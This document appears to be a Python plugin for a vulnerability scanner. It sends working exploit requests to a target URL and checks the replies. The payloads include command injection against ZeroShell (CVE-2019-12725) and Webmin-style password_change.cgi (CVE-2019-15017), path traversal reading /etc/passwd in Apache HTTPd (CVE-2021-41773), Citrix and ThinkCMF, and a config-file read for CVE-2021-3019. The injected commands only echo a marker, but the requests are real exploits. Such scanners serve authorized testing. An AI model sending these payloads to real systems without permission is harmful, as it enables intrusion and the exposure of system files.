#!/usr/bin/ python
from plugins.config.config_package import *

#green = '\033[01;32m'
#end = '\033[0m'

class checkcve(object):
    def __init__(self,url):
        self.url = url
    
    def check_CVE_2019_12725(url):
        path = """cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d"echo%20cve201912725"%0A'"""
        res = core.get(url,path)
        if res.status_code == 200 and 'cve201912725' in res.text:
            core.checksuc(target=url,name='CVE-2019-12725 ZeroShell RCE',payload='echo cve201912725')
        else:
            pass
    
    def check_CVE_2019_15017(url):
        dir = "password_change.cgi"
        data = "user=rootxx&pam=&expired=2&old=test|echo%20cve201915017&new1=test2&new2=test2"
        header  = {
            'Accept-Encoding': "gzip, deflate",
            'Accept': "*/*",
            'Accept-Language': "en",
            'User-Agent': "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            'Connection': "close",
            'Cookie': "redirect=1; testing=1; sid=x; sessiontest=1",
            'Referer': "%s/session_login.cgi"%url,
            'Content-Type': "application/x-www-form-urlencoded",
            'Content-Length': "60",
            'cache-control': "no-cache"
        } 
        try:
            res = requests.post(url=url+dir, headers=header, data=data,verify=False,timeout=3)
            if res.status_code == 200 and "cve201915017" in res.text:
                core.checksuc(target=url,name='CVE-2019-15017',payload='user=rootxx&pam=&expired=2&old=test|echo%20cve201915017&new1=test2&new2=test2')
            else:
                pass
        except Exception as e:
            pass
        except KeyboardInterrupt:
            sys.exit()
    
    def check_CVE_2020_8209(url):
        path = 'jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
        res = core.get(url,path)
        if res.status_code==200 and "nologin" in res.text:
            core.checksuc(target=url,name='CVE-2020-8209',payload="/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd")
        else:
            pass
    
    def check_CVE_2021_41773(url):
        path = 'cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        res = core.get(url,path)
        if res.status_code==200 and "nologin" in res.text:
            core.checksuc(target=url,name='CVE-2021-41773 Apache HTTPd 目录穿越漏洞',payload='/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd') 
        else: 
            pass

    def check_CVE_2021_3019(url):
        try:
            header = {'user-agent': 'WebFox/0.0.1'}
            dir = '../conf/config.properties'
            data = '{"username":"","password":""}'
            res = requests.get(url + dir,headers=header, data=data,verify=False,timeout=2)
            if res.status_code == 200 and 'username' in res.text:
                core.checksuc(target=url,name='CVE-2021-3019 Landproxy',payload=None) 
            else:
                pass
        except Exception as e:
            pass
        except KeyboardInterrupt:
            sys.exit()

    def thinkcmf(url):
        path = '?a=display&templateFile=../../../../../../../../../../etc/passwd'
        res = core.get(url,path)
        if res.status_code == 200 and 'nologin' in res.text:
            core.checksuc(target=url,name='ThinkCMF任意文件包含',payload='?a=display&templateFile=../../../../../../../../../../etc/passwd')   
        else: 
            pass



